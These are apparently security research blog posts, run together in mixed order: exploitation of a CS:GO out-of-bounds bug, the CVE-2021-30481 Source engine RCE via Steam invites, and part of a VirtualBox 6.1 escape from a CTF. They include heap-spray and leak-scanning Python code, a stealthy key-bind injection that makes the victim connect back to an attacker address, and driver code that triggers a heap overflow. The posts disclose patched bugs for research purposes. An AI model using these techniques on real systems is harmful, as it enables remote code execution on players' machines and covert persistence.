Putting it all together: ConVars as a gadget

To further enable customization of the game, the server and client exchange ConVars, which are essentially configuration options.

Each ConVar is managed by a global object, stored in engine.dll. The following code snippet shows a simplified definition of such an object which is used to explain why ConVars turned out to be a powerful gadget to help exploit the OOB access:

struct ConVar {
    char *convar_name;
    int data_len;
    void *convar_data;
    int color_value;
};

A community server can update its ConVar values during a match and notify the client by sending the CNETMsg_SetConVar message:

message CMsg_CVars {
	message CVar {
		optional string name = 1;
		optional string value = 2;
		optional uint32 dictionary_name = 3;
	}

	repeated .CMsg_CVars.CVar cvars = 1;
}

message CNETMsg_SetConVar {
	optional .CMsg_CVars convars = 1;
}

These messages consist of a simple key/value structure. When comparing the message definition to the struct ConVar definition, it is correct to assume that the entirely attacker-controllable value field of the ConVar message is copied to the client’s heap and a pointer to it is stored in the convar_value field of a ConVar object.

As we previously discussed, the OOB access in CSVCMsg_SplitScreen occurs in an array of pointers to objects. Here is the decompilation of the code in which the OOB access occurs as a reminder:

Since the array and all ConVars are located in the .data section of engine.dll, we can reliably set the player_slot argument such that the ptr_to_object points to a ConVar value which we previously set. This can be illustrated as follows:

We also mentioned earlier that a few instructions after the OOB access a virtual method on the object is called. This happens as usual through a vtable dereference. Here is the code again as a reminder:

Since we control the contents of the object through the ConVar, we can simply set the vtable pointer to any value. In order to make the exploit 100% reliable, it would make sense to use the info leak to point back into the .data section of engine.dll into controlled data.

Luckily, some ConVars are interpreted as color values and expect a 4 byte (Red Blue Green Alpha) value, which can be attacker controlled. This value is stored directly in the color_value field in above struct ConVar definition. Since the CS:GO process on Windows is 32-bit, we were able to use the color value of a ConVar to fake a pointer.

If we use the fake object’s vtable pointer to point into the .data section of engine.dll, such that the called method overlaps with the color_value, we can finally hijack the EIP register and redirect control flow arbitrarily. This chain of dereferences can be illustrated as follows:

ROP chain to RCE

With ASLR broken and us having gained arbitrary instruction pointer control, all that was left to do was build a ROP chain that finally lead to us calling ShellExecuteA to execute arbitrary system commands.

Conclusion

We submitted both bugs in one report to Valve’s HackerOne program, along with the exploit we developed that proved 100% reliablity. Unfortunately, in over 4 months, we did not even receive an acknowledgment by a Valve representative. After public pressure, when it became apparent that Valve had also ignored other Security Researchers with similar impact, Valve finally fixed numerous security issues. We hope that Valve re-structures its Bug Bounty program to attract Security Researchers again.

Time Table

Date (DD/MM/YYYY) What
04.01.2021 Reported both bugs in one report to Valve’s bug bounty program
11.01.2021 A HackerOne triager verifies the bug and triages it
10.02.2021 First follow-up, no response from Valve
23.02.2021 Second follow-Up, no response from Valve
10.04.2021 Disclosure of Bug existance via twitter
15.04.2021 Third follow-up, no response from Valve
28.04.2021 Valve patches both bugs

Breaking ASLR

In the Uninitialized memory in HTTP downloads leads to information disclosure section, we showed how the HTTP download allowed us to view arbitrarily sized chunks of uninitialized memory in a client’s game process.

We discovered another message that seemed quite interesting to us: CSVCMsg_SendTable. Whenever a client received such a message, it would allocate an object with attacker-controlled integer on the heap. Most importantly, the first 4 bytes of the object would contain a vtable pointer into engine.dll.

def spray_send_table(s, addr, nprops):
    table = nmsg.CSVCMsg_SendTable()
    table.is_end = False
    table.net_table_name = "abctable"
    table.needs_decoder = False

    for _ in range(nprops):
        prop = table.props.add()
        prop.type = 0x1337ee00
        prop.var_name = "abc"
        prop.flags = 0
        prop.priority = 0
        prop.dt_name = "whatever"
        prop.num_elements = 0
        prop.low_value = 0.0
        prop.high_value = 0.0
        prop.num_bits = 0x00ff00ff

    tosend = prepare_payload(table, 9)
    s.sendto(tosend, addr)

The Windows heap is kind of nondeteministic. That is, a malloc -> free -> malloc combo will not yield the same block. Thankfully, Saar Amaar published his great research about the Windows heap, which we consulted to get a better understanding about our exploit context.

We came up with a spray to allocate many arrays of SendTable objects with markers to scan for when we uploaded the files back to the server. Because we can choose the size of the array, we chose a not so commonly alloacted size to avoid interference with normal game code. If we now deallocate all of the sprayed arrays at once and then let the client download the files the chance of one of the files to hit a previously sprayed chunk is relativly high.

In practice, we almost always got the leak in the first file and when we didn’t we could simply reset the connection and try again, as we have not corrupted the program state yet. In order to maximize success, we created four files for the exploit. This ensures that at least one of them succeeds and otherwise simply try again.

The following code shows how we scanned the received memory for our sprayed object to find the SendTable vtable which will point into engine.dll.

files_received.append(fn)
pp = packetparser.PacketParser(leak_callback)

for i in range(len(data) - 0x54):
    vtable_ptr = struct.unpack('<I', data[i:i+4])[0]
    table_type = struct.unpack('<I', data[i+8:i+12])[0]
    table_nbits = struct.unpack('<I', data[i+12:i+16])[0]
    if table_type == 0x1337ee00 and table_nbits == 0x00ff00ff:
        engine_base = vtable_ptr - OFFSET_VTABLE 
        print(f"vtable_ptr={hex(vtable_ptr)}")
        break

CVE-2021-30481: Source engine remote code execution via game invites

By: floesen
20 April 2021 at 00:00

Steam is the most popular PC game launcher in the world. It gives millions of people the chance to play their favorite video games with their friends using the built in friend and party system, so it’s safe to assume most users have accepted an invite at one point or another. There’s no real danger in that, is there?

In this blog post, we will look at how an attacker can use the Steamworks API in combination with various features and properties of the Source engine to gain remote code execution (RCE) through malicious Steam game invites.

Why game invites do more than you think they do

The Steamworks API allows game developers to access various Steam features from within their game through a set of different interfaces. For example, the ISteamFriends interface implements functions such as InviteUserToGame and ReplyToFriendMessage, which, as their names suggest, let you interact with your friends either by inviting them to your game or by just sending them a text message. How can this become a problem?

Things become interesting when looking at what InviteUserToGame actually does to get a friend into your current game/lobby. Here, you can see the function prototype and an excerpt of the description from the official documentation:

bool InviteUserToGame( CSteamID steamIDFriend, const char *pchConnectString );

“If the target user accepts the invite then the pchConnectString gets added to the command-line when launching the game. If the game is already running for that user, then they will receive a GameRichPresenceJoinRequested_t callback with the connect string.”

Basically, that means that if your friends do not already have the game started, you can specify additional start parameters for the game process, which will be appended at the end of the command line. For regular invites in the context of, e.g., CS:GO, the start parameter +connect_lobby in combination with your 64-bit lobby ID is appended. This very command, in turn, is executed by your in-game console and eventually gets you into the specified lobby. But where is the problem now?

When specifying console commands in the start parameters of a Source engine game, you are not given any limitations. You can arbitrarily execute any game command of your choice. Here, you can now give free rein to your creativity; everything you can configure in the UI and much more beyond that can generally be tweaked with using console commands. This allows for funny things as messing with people’s game language, their sensitivity, resolution, and generally everything settings-related you can think of. In my opinion, this is already quite questionable but not extremely malicious yet.

Using console commands to build up an RCON connection

A lot of Source engine games come with something that is known as the Source RCON Protocol. Briefly summarized, this protocol enables server owners to execute console commands in the context of their game servers in the same manner as you would typically do it to configure something in your game client. This works by prefixing any console command with rcon before executing it. In order to do so, this requires you to previously connect and authenticate yourself to the game server using the rcon_address and rcon_password commands. You might already know where this is going… An attacker can execute the InviteUserToGame function with the second parameter set to "+rcon_address yourip:yourport +rcon". As soon as the victims accept the invite, the game will start up and try to connect back to the specified address without any notification whatsoever. Note that the additional +rcon at the end is required because the client does not initiate the connection until there is an attempt to actually communicate to the server. All of this is already very concerning as such invites inherently leak the victim’s IP address to the attacker.

Abusing the RCON connection

A further look into how the Source engine implements RCON on the client-side reveals the full potential. In CRConClient::ParseReceivedData, we can see how the client reacts to different types of RCON packets coming from the server. Within the scope of this work, we only look at the following three types of packets: SERVERDATA_RESPONSE_STRING, SERVERDATA_SCREENSHOT_RESPONSE, and SERVERDATA_CONSOLE_LOG_RESPONSE. The following image 1 shows how RCON packets look like in general. The content delivered by the packet starts with the Body member and is typically null-terminated with the Empty String field.

Now, starting with the first type, it allows an attacker hosting a malicious RCON server to print arbitrary strings into the connected victim’s game console as long as the RCON connection remains open. This is not related to the final RCE, but it is too funny to just leave it out. Below, there is an example of something that would certainly be surprising to anybody who sees it popping up in their console.

Let’s move on to the exciting part. To simplify matters, we will only explain how the client handles SERVERDATA_SCREENSHOT_RESPONSE packets as the code is almost exactly the same for SERVERDATA_CONSOLE_LOG_RESPONSE packets. Eventually, the client treats the packet data it receives as a ZIP file and tries to find a file with the name screenshot.jpg inside. This file is then subsequently unpacked to the root CS:GO installation folder. Unfortunately, we cannot control the name under which the screenshot is saved on the disk nor can we control the file extension. The screenshot is always saved as screenshotXXXX.jpg where XXXX represents a 4-digit suffix starting at 0000, which is increased as long as a file with that name already exists.

void CRConClient::SaveRemoteScreenshot( const void* pBuffer, int nBufLen )
{
	char pScreenshotPath[MAX_PATH];
	do 
	{
		Q_snprintf( pScreenshotPath, sizeof( pScreenshotPath ), "%s/screenshot%04d.jpg", m_RemoteFileDir.Get(), m_nScreenShotIndex++ );	
	} while ( g_pFullFileSystem->FileExists( pScreenshotPath, "MOD" ) );

	char pFullPath[MAX_PATH];
	GetModSubdirectory( pScreenshotPath, pFullPath, sizeof(pFullPath) );
	HZIP hZip = OpenZip( (void*)pBuffer, nBufLen, ZIP_MEMORY );

	int nIndex;
	ZIPENTRY zipInfo;
	FindZipItem( hZip, "screenshot.jpg", true, &nIndex, &zipInfo );
	if ( nIndex >= 0 )
	{
		UnzipItem( hZip, nIndex, pFullPath, 0, ZIP_FILENAME );
	}
	CloseZip( hZip );
}

Note that an attacker can send these kinds of RCON packets without the client requesting anything prior. Already, an attacker can upload arbitrary files if the victim accepts the game invite. So far, there is no memory corruption required yet.

Integer underflow in FindZipItem leads to remote code execution

The functions OpenZip, FindZipItem, UnzipItem, and CloseZip belong to a library called XZip/XUnzip. The specific version of the library which is used by the RCON handler dates back to 2003. While we found several flaws in the implementation, we will only focus on the first one that helped us get code execution.

As soon as CRConClient::SaveRemoteScreenshot calls FindZipItem to retrieve information about the screenshot.jpg file inside the archive, TUnzip::Get is called. Inside TUnzip::Get, the archive is parsed according to the ZIP file format. This includes processing the so-called central directory file header.

int unzlocal_GetCurrentFileInfoInternal (unzFile file, unz_file_info *pfile_info,
   unz_file_info_internal *pfile_info_internal, char *szFileName,
   uLong fileNameBufferSize, void *extraField, uLong extraFieldBufferSize,
   char *szComment, uLong commentBufferSize)
{
	// ...
	s=(unz_s*)file;
	// ...
	if (unzlocal_getLong(s->file,&file_info_internal.offset_curfile) != UNZ_OK)
		err=UNZ_ERRNO;
	// ...
}

In the code above, the relative offset of the local file header located in the central directory file header is read into file_info_internal.offset_curfile. This allows to locate the actual position of the compressed file in the archive, and it will play a key role later on.

Somewhere later in TUnzip::Get, a function with the name unzlocal_CheckCurrentFileCoherencyHeader is called. Here, the previously mentioned local file header is now processed given the offset that was retrieved before. This is what the corresponding code looks like:

int unzlocal_CheckCurrentFileCoherencyHeader (unz_s *s,uInt *piSizeVar,
   uLong *poffset_local_extrafield, uInt  *psize_local_extrafield)
{
	// ...
	if (lufseek(s->file,s->cur_file_info_internal.offset_curfile + s->byte_before_the_zipfile,SEEK_SET)!=0)
		return UNZ_ERRNO;


	if (err==UNZ_OK)
		if (unzlocal_getLong(s->file,&uMagic) != UNZ_OK)
			err=UNZ_ERRNO;
	// ...
}

At first, a call to lufseek sets the internal file pointer to point to the local file header in the archive (here, it can be assumed that there are no additional bytes in front of the archive).

From this assumption it follows that s->byte_before_the_zipfile is 0.

This is very similar to how dealing with files works in the C standard library. In our specific case, the RCON handler opened the ZIP archive with the ZIP_MEMORY flag, thus specifying that the archive is essentially just a byte blob in memory. Therefore, calls to lufseek only update a member in the file object.

int lufseek(LUFILE *stream, long offset, int whence)
{
	// ...
	else
	{ 
		if (whence==SEEK_SET) stream->pos=offset;
		else if (whence==SEEK_CUR) stream->pos+=offset;
		else if (whence==SEEK_END) stream->pos=stream->len+offset;
		return 0;
	}
}

Once lufseek returns, another function with the name unzlocal_getLong is invoked to read out the magic bytes that identify the local file header. Internally, this function calls unzlocal_getByte four times to read out every single byte of the long value. unzlocal_getByte in turn calls lufread to directly read from the file stream.

int unzlocal_getLong(LUFILE *fin,uLong *pX)
{
	uLong x ;
	int i = 0;
	int err;

	err = unzlocal_getByte(fin,&i);
	x = (uLong)i;

	if (err==UNZ_OK)
		err = unzlocal_getByte(fin,&i);
	x += ((uLong)i)<<8;

	// repeated two more times for the remaining bytes
	// ...
	return err;
}

int unzlocal_getByte(LUFILE *fin,int *pi)
{
	unsigned char c;
	int err = (int)lufread(&c, 1, 1, fin);
	// ...
}

size_t lufread(void *ptr,size_t size,size_t n,LUFILE *stream)
{
	unsigned int toread = (unsigned int)(size*n);
	// ...
	if (stream->pos+toread > stream->len) toread = stream->len-stream->pos;
	memcpy(ptr, (char*)stream->buf + stream->pos, toread); DWORD red = toread;
	stream->pos += red;
	return red/size;
}

Given the fact that s->cur_file_info_internal.offset_curfile can be arbitrarily controlled by modifying the corresponding field in the central directory structure, the stack can be smashed in the first call to lufread right on the spot. If you set the local file header offset to 0xFFFFFFFE a chain of operations eventually leads to code execution.

First, the call to lufseek in unzlocal_CheckCurrentFileCoherencyHeader will set the pos member of the file stream to 0xFFFFFFFE. When unzlocal_getLong is called for the first time, unzlocal_getByte is also invoked. lufread then tries to read a single byte from the file stream. The variable toread inside lufread that determines the amount of memory to be read will be equal to 1 and therefore the condition if (stream->pos + toread > stream->len) (unsigned comparison) becomes true. stream->pos + toread calculates 0xFFFFFFFE + 1 = 0xFFFFFFFF and thus is likely greater than the overall length of the archive which is stored in stream->len. Next, the toread variable is updated with stream->len - stream->pos which calculates stream->len - 0xFFFFFFFE. This calculation underflows and effectively computes stream->len + 2. Note how in the call to memcpy the calculation of the source parameter overflows simultaneously. Finally, the call to memcpy can be considered equivalent to this:

memcpy(ptr, (char*)stream->buf - 2, stream->len + 2);

Given that ptr points to a local variable of unzlocal_getByte that is just a single byte in size, this immediately corrupts the stack.

unzlocal_getByte calls lufread(&c, 1, 1, fin) with c being an unsigned char.

Luckily, the memcpy call writes the entire archive blob to the stack, enabling us to also control the content of what is written.

At this point, all that is left to do is constructing a ZIP archive that has the local file header offset set to 0xFFFFFFFE and otherwise primarily consists of ROP gadgets only. To do so, we started with a legitimate archive that contains a single screenshot file. Then, we proceeded to corrupt the offset as mentioned above and observed where to put the gadgets at based on the faulting EIP value. For the ROP chain itself, we exploited the fact that one of the DLLs loaded into the game called xinput1_3.dll has ASLR disabled. That being said, its base address can be somewhat reliably guessed. The exploit only ever fails when its preferred address is already occupied by another DLL. Without doing proper statistical measurements, the probability of the exploit to work is estimated to be somewhere around 80%. For more details on this, feel free to check out the PoC, which is linked in the last section of this article.

Advancing the RCE even more

Interestingly, at the very end, you can once again see how this exploit benefits from the start parameter injection and the RCON capabilities.

Let’s start with the apparent fact that the arbitrary file upload, which was discussed previously, greatly helps this exploit to reach its full potential. One shellcode to rule them all or in other words: Whether you want to execute the calculator or a malicious binary you previously uploaded, it really does not matter. All that needs to be done is changing a single string in the exploit shellcode. It does not matter if your binary has been saved with the .png extension.

Finally, there is still something that can be done to make the exploit more powerful. We cannot change the fact that the exploit attempts fail from time to time due to bad luck with the base addresses, but what if we had unlimited tries to attempt the code execution? Seems unreasonable? It actually is very reasonable.

The Source engine comes with the console command host_writeconfig that allows us to write out the current game configuration to the config file on the disk. Obviously, we can also inject this command using game invites. Right before doing that, however, we can use bind to configure any key that is frequently pressed by players to execute the RCON connection commands from the very beginning. Bonus points if you make the keys maintain their original functionality to remain stealthy. Once we configured such a key, we can write out the settings to the disk so that the changes become persistent. Here is an example showing how the tab key can be stealthily configured to initiate an outgoing RCON connection each time it is pressed.

+bind "tab" "+showscores;rcon_address ip:port;rcon" +host_writeconfig

Now, after accepting just a single invite, you can try to run the exploit on your victims whenever they look at the scoreboard.

Also bind +showscores as that way tab keeps showing the scoreboard.

Timeline and final words

  • [2019-06-05] Reported to Valve on HackerOne
  • [2019-09-14] Bug triaged
  • [2020-10-23] Bounty paid ($8000) & notification that initial fix was deployed in Team Fortress 2
  • [2021-04-17] Final patch

PoC exploit code can be found on my github. The vulnerability was given a severity rating of 9.0 (critical) by Valve.

The recent updates make it impossible to carry out this exploit any longer. First of all, Valve removed the offending RCON command handlers making the arbitrary file upload and the code execution in the unzipping code impossible. Also, at least for CS:GO, Valve seems to now use GetLaunchCommandLine instead of the OS command line. However, in CS:S (and maybe other games?) the OS command line apparently is still in use. After all, at least a warning is displayed that shows the parameters your game is about to start with for those games. The next image shows how such a warning would look like when accepting an invite that rebinds a key and establishes an RCON connection at the same time.

Remember that if you click Ok here, you are more or less agreeing to install a persistent IP logger.

At the very end, I would like to talk about a different matter. Personally, it is imperative to say a few final words about the situation with Valve and their bug bounty program. To sum up, the public disclosure about the existence of this bug has caused quite a stir regarding Valve’s slow response times to bugs. I never wanted to just point the finger at Valve and complain about my experiences; I want to actually change something in the long run too. The efforts that other researchers have put and are going to put into the search for bugs should not be in vain. Hopefully, things will improve in the future so we can happily work with Valve again to enhance the security of their games.

  1. https://developer.valvesoftware.com/wiki/Source_RCON_Protocol 

Escaping VirtualBox 6.1: Part 1

14 January 2021 at 23:00

This post is about a VirtualBox escape for the latest currently available version (VirtualBox 6.1.16 on Windows). The vulnerabilities were discovered and exploited by our team Sauercl0ud as part of the RealWorld CTF 2020/2021.

The vulnerability was known to the organizers, requires the guest to be able to insert kernel modules and isn’t exploitable on default configurations of VirtualBox so the impact is very limited.

Many thanks to the organizers for hosting this great competition, especially to ChenNan for creating this challenge, M4x for always being helpful, answering our questions and sitting with us through the many demo attempts and of course all the people involved in writing the exploit.

Let’s get to some pwning :D

Discovering the Vulnerability

The challenge description already hints at where a bug might be:

Goal:

Please escape VirtualBox and spawn a calc(“C:\Windows\System32\calc.exe”) on the host operating system.

You have the full permissions of the guest operating system and can do anything in the guest, including loading drivers, etc.

But you can’t do anything in the host, including modifying the guest configuration file, etc.

Hint: SCSI controller is enabled and marked as bootable.

Environment:

In order to ensure a clean environment, we use virtual machine nesting to build the environment. The details are as follows:

  • VirtualBox:6.1.16-140961-Win_x64.
  • Host: Windows10_20H2_x64 Virtual machine in Vmware_16.1.0_x64.
  • Guest: Windows7_sp1_x64 Virtual machine in VirtualBox_6.1.16_x64.

The only special thing about the VM is that the SCSI driver is loaded and marked bootable so that’s the place for us to start looking for vulnerabilities.

Here are the operations the SCSI device supports:

// /src/VBox/Devices/Storage/DevBusLogic.cpp
    
    // [...]

    if (fBootable)
    {
        /* Register I/O port space for BIOS access. */
        rc = PDMDevHlpIoPortCreateExAndMap(pDevIns, BUSLOGIC_BIOS_IO_PORT, 4 /*cPorts*/, 0 /*fFlags*/,
                                           buslogicR3BiosIoPortWrite,       // Write a byte
                                           buslogicR3BiosIoPortRead,        // Read a byte
                                           buslogicR3BiosIoPortWriteStr,    // Write a string
                                           buslogicR3BiosIoPortReadStr,     // Read a string
                                           NULL /*pvUser*/,
                                           "BusLogic BIOS" , NULL /*paExtDesc*/, &pThis->hIoPortsBios);
        // [...]
    }
    // [...]

The SCSI device implements a simple state machine with a global heap allocated buffer. When initiating the state machine, we can set the buffer size and the state machine will set a global buffer pointer to point to the start of said buffer. From there on, we can either read one or more bytes, or write one or more bytes. Every read/write operation will advance the buffer pointer. This means that after reading a byte from the buffer, we can’t write that same byte and vice versa, because the buffer pointer has already been advanced.

While auditing the vboxscsiReadString function, tsuro and spq found something interesting:

// src/VBox/Devices/Storage/VBoxSCSI.cpp

/**
 * @retval VINF_SUCCESS
 */
int vboxscsiReadString(PPDMDEVINS pDevIns, PVBOXSCSI pVBoxSCSI, uint8_t iRegister,
                       uint8_t *pbDst, uint32_t *pcTransfers, unsigned cb)
{
    RT_NOREF(pDevIns);
    LogFlowFunc(("pDevIns=%#p pVBoxSCSI=%#p iRegister=%d cTransfers=%u cb=%u\n",
                 pDevIns, pVBoxSCSI, iRegister, *pcTransfers, cb));

    /*
     * Check preconditions, fall back to non-string I/O handler.
     */
    Assert(*pcTransfers > 0);

    /* Read string only valid for data in register. */
    AssertMsgReturn(iRegister == 1, ("Hey! Only register 1 can be read from with string!\n"), VINF_SUCCESS);

    /* Accesses without a valid buffer will be ignored. */
    AssertReturn(pVBoxSCSI->pbBuf, VINF_SUCCESS);

    /* Check state. */
    AssertReturn(pVBoxSCSI->enmState == VBOXSCSISTATE_COMMAND_READY, VINF_SUCCESS);
    Assert(!pVBoxSCSI->fBusy);

    RTCritSectEnter(&pVBoxSCSI->CritSect);
    /*
     * Also ignore attempts to read more data than is available.
     */
    uint32_t cbTransfer = *pcTransfers * cb;
    if (pVBoxSCSI->cbBufLeft > 0)
    {
        Assert(cbTransfer <= pVBoxSCSI->cbBuf);     // --- [1] ---
        if (cbTransfer > pVBoxSCSI->cbBuf)
        {
            memset(pbDst + pVBoxSCSI->cbBuf, 0xff, cbTransfer - pVBoxSCSI->cbBuf);
            cbTransfer = pVBoxSCSI->cbBuf;  /* Ignore excess data (not supposed to happen). */
        }

        /* Copy the data and adance the buffer position. */
        memcpy(pbDst, 
               pVBoxSCSI->pbBuf + pVBoxSCSI->iBuf,  // --- [2] ---
               cbTransfer);

        /* Advance current buffer position. */
        pVBoxSCSI->iBuf      += cbTransfer;
        pVBoxSCSI->cbBufLeft -= cbTransfer;         // --- [3] ---

        /* When the guest reads the last byte from the data in buffer, clear
           everything and reset command buffer. */

        if (pVBoxSCSI->cbBufLeft == 0)              // --- [4] ---
            vboxscsiReset(pVBoxSCSI, false /*fEverything*/);
    }
    else
    {
        AssertFailed();
        memset(pbDst, 0, cbTransfer);
    }
    *pcTransfers = 0;
    RTCritSectLeave(&pVBoxSCSI->CritSect);

    return VINF_SUCCESS;
}

We can fully control cbTransfer in this function. The function initially makes sure that we’re not trying to read more than the buffer size [1]. Then, it copies cbTransfer bytes from the global buffer into another buffer [2], which will be sent to the guest driver. Finally, cbTransfer bytes get subtracted from the remaining size of the buffer [3] and if that remaining size hits zero, it will reset the SCSI device and require the user to reinitiate the machine state, before reading any more bytes.

So much for the logic, but what’s the issue here? There is a check at [1] that ensures no single read operation reads more than the buffer’s size. But this is the wrong check. It should verify, that no single read can read more than the buffer has left. Let’s say we allocate a buffer with a size of 40 bytes. Now we call this function to read 39 bytes. This will advance the buffer pointer to point to the 40th byte. Now we call the function again and tell it to read 2 more bytes. The check in [1] won’t bail out, since 2 is less than the buffer size of 40, however we will have read 41 bytes in total. Additionally, this will cause the subtraction in [3] to underflow and cbBufLeft will be set to UINT32_MAX-1. This same cbBufLeft will be checked when doing write operations and since it is very large now, we’ll be able to also write bytes that are outside of our buffer.

Getting OOB read/write

We understand the vulnerability, so it’s time to develop a driver to exploit it. Ironically enough, the “getting a driver to build” part was actually one of the hardest (and most annoying) parts of the exploit development. malle got to building VirtualBox from source in order for us to have symbols and a debuggable process while 0x4d5a came up with the idea of using the HEVD driver as a base for us to work with, since it does some similar things to what we need. Now let’s finally start writing some code.

Here’s how we triggered the bug:

void exploit() {
    static const uint8_t cdb[1] = {0};
    static const short port = 0x434;
    static const uint32_t buffer_size = 1024;

    // reset the state machine
    __outbyte(port+3, 0);

    // initiate a write operation
    __outbyte(port+0, 0); // TargetDevice (0)
    __outbyte(port+0, 1); // direction (to device)
    
    __outbyte(port+0, ((buffer_size >> 12) & 0xf0) | (sizeof(cdb) & 0xf)); // buffer length hi & cdb length
    __outbyte(port+0, buffer_size);                                        // bugger length low
    __outbyte(port+0, buffer_size >> 8);                                   // buffer length mid
    
    for(int i = 0; i < sizeof(cdb); i++)
        __outbyte(port+0, cdb[i]);


    // move the buffer pointer to 8 byte after the buffer and the remaining bytes to -8
    char buf[buffer_size];
    __inbytestring(port+1, buf, buffer_size - 1)    // Read bufsize-1
    __inbytestring(port+1, buf, 9)                  // Read 9 more bytes

    for(int i = 0; i < sizeof(buf); i += 4)
        *((uint32_t*)(&buf[i])) = 0xdeadbeef
    for(int i = 0; i < 10000; i++)
        __outbytestring(port+1, buf, sizeof(buf))
}

The driver first has to initiate the SCSI state machine with a bufsize. Then we read bufsize-1 bytes and then we read 9 bytes. We chose 9 instead of 2 byte in order to have the buffer pointer 8 byte aligned after the overflow. Finally, we overwrite the next 10000kb after our allocated buffer+8 with 0xdeadbeef.

After loading this driver in the win7 guest, this is what we get:

As expected, the VM crashes because we corrupted the heap. Now we know that our OOB read/write works and since working with drivers was annoying, we decided to modify the driver one last time to expose the vulnerability to user-space. The driver was modified to accept this Req struct via an IOCTL:

enum operations {
    OPERATION_OUTBYTE = 0,
    OPERATION_INBYTE = 1,
    OPERATION_OUTSTR = 2,
    OPERATION_INSTR = 3,
};

typedef struct {
    volatile unsigned int port;
    volatile unsigned int operation;
    volatile unsigned int data_byte_out;
} Req;

This enables us to use the driver as a bridge to communicate with the SCSI device from any user-space program. This makes exploit prototyping a whole lot faster and has the added benefit of removing the need to touch Windows drivers ever again (well, for the rest of this exploit anyway :D).

The bug gives us a liner heap OOB read/write primitive. Our goal is to get from here to arbitrary code execution so let’s put this bug to use!

Leaking vboxc.dll and heap addresses

We’re able to dump heap data using our OOB read but we’re still far from code execution. This is a good point to start leaking addresses. The least we’ll require for nice exploitation is a code leak (i.e. leaking the address of any dll in order to get access to gadgets) and a heap address leak to facilitate any post exploitation we might want to do.

This calls for a heap spray to get some desired objects after our leak object to read their pointers. We’d like the objects we spray to tick the following boxes:

  1. Contains a pointer into a dll
  2. Contains a heap address
  3. (Contains some kind of function pointer which might get useful later on)

After going through some options, we eventually opted for an HGCMMsgCall spray. Here’s it’s (stripped down) structure. It’s pretty big so I removed any parts that we don’t care about:

class HGCMMsgCall: public HGCMMsgHeader
{
    // A list of parameters including a 
    // char[] with controlled contents
    VBOXHGCMSVCPARM *paParms;
    
    // [...]
};

class HGCMMsgHeader: public HGCMMsgCore
{
    public:
        // [...]
        /* Port to be informed on message completion. */
        PPDMIHGCMPORT pHGCMPort;
};

typedef struct PDMIHGCMPORT
{
    // [...]
    /**
     * Checks if @a pCmd was cancelled.
     *
     * @returns true if cancelled, false if not.
     * @param   pInterface          Pointer to this interface.
     * @param   pCmd                The command we're checking on.
     */
    DECLR3CALLBACKMEMBER(bool, pfnIsCmdCancelled,(PPDMIHGCMPORT pInterface, PVBOXHGCMCMD pCmd));
    // [...]

} PDMIHGCMPORT;

class HGCMMsgCore : public HGCMReferencedObject
{
    private:
        // [...]
        /** Next element in a message queue. */
        HGCMMsgCore *m_pNext;
        /** Previous element in a message queue.
         *  @todo seems not necessary. */
        HGCMMsgCore *m_pPrev;
        // [...]
};

It contains a VTable pointer, two heap pointers (m_pNext and m_pPrev) because HGCMMsgCall objects are managed in a doubly linked list and it has a callback function pointer in m_pfnCallback so HGCMMsgCall definitely fits the bill for a good spray target. Another nice thing is that we’re able to call the pHGCMPort->pfnIsCmdCancelled pointer at any point we like. This works because this pointer gets invoked on all the already allocated messages, whenever a new message is created. HGCMMsgCall’s size is 0x70, so we’ll have to initiate the SCSI state machine with the same size to ensure our buffer gets allocated in the same heap region as our sprayed objects.

Conveniently enough, niklasb has already prepared a function we can borrow to spray HGCMMsgCall objects.

Calling niklas’ wait_prop function will allocate a HGCMMsgCall object with a controlled pszPatterns field. This char array is very useful because it is referenced by the sprayed objects and can be easily identified on the heap.

Spraying on a Low-fragmentation Heap can be a little tricky but after some trial and error we got to the following spray strategy:

  1. We iterate 64 times
  2. Each time we create a client and spray 16 HGCMMsgCalls

That way, we seemed to reliably get a bunch of the HGCMMsgCalls ahead of our leak object which allows us to read and write their fields.

First things first: getting the code leak is simple enough. All we have to do is to read heap memory until we find something that matches the structure of one of our HGCMMsgCall and read the first quad-word of said object. The VTable points into VBoxC.dll so we can use this leak to calculate the base address of VBoxC.dll for future use.

Getting the heap leak is not as straight forward. We can easily read the m_pNext or m_pPrev fields to get a pointer to some other HGCMMsgCall object but we don’t have any clue about where that object is located relatively to our current buffer position. So reading m_pNext and m_pPrev of one object is useless… But what if we did the same for a second object? Maybe you can already see where this is going. Since these objects are organized in a doubly linked list, we can abuse some of their properties to match an object A to it’s next neighbor B.

This works because of this property:

addr(B) - addr(A) == A->m_pNext - B->m_pPrev

To get the address of B, we have to do the following:

  1. Read object A and save the pointers
  2. Take note of how many bytes we had to read until we found the next object B in a variable x
  3. Read object B and save the pointers
  4. If A->m_pNext - B->m_pPrev == x we most likely found the right neighbor and know that B is at A->m_pNext. If not, we just keep reading objects

This is pretty fast and works somewhat reliably. Equipped with our heap address and VBoxC.dll base address leak, we can move on to hijacking the execution flow.

Getting RIP control

Remember those pfnIsCmdCancelled callbacks? Those will make for a very short “Getting RIP control” section… :P

There’s really not that much to this part of the exploit. We only have to read heap data until we find another one of our HGCMMsgCalls and overwrite m_pfnCallback. As soon as a new message gets allocated, this method is called on our corrupted object with a malicious pHgcmPort->pfnIsCmdCancelled field.

/**
 * @interface_method_impl{VBOXHGCMSVCHELPERS,pfnIsCallCancelled}
 */
/* static */ DECLCALLBACK(bool) HGCMService::svcHlpIsCallCancelled(VBOXHGCMCALLHANDLE callHandle)
{
    HGCMMsgHeader *pMsgHdr = (HGCMMsgHeader *)callHandle;
    AssertPtrReturn(pMsgHdr, false);

    PVBOXHGCMCMD pCmd = pMsgHdr->pCmd;
    AssertPtrReturn(pCmd, false);

    PPDMIHGCMPORT pHgcmPort = pMsgHdr->pHGCMPort;   // We corrupted pHGCMPort
    AssertPtrReturn(pHgcmPort, false);

    return pHgcmPort->pfnIsCmdCancelled(pHgcmPort, pCmd);   // --- Profit ---
}

Internally, svcHlpIsCallCancelled will load pHgcmPort into r8 and execute a jmp [r8+0x10] instruction. Here’s what happens if we corrupt m_pfnCallback with 0x0000000041414141:

Code execution

At this point, we are able to redirect code execution to anywhere we want. But where do we want to redirect it to? Oftentimes getting RIP control is already enough to solve CTF pwnables. Glibc has these one-gadgets which are basically addresses you jump to, that will instantly give you a shell. But sadly there is no leak-kernel32dll-set-rcx-to-calc-and-call-WinExec one-gadget in VBoxC.dll which means we’ll have to get a little creative once more. ROP is not an option because we don’t have stack control so the only thing left is JOP(Jump-Oriented-Programming).

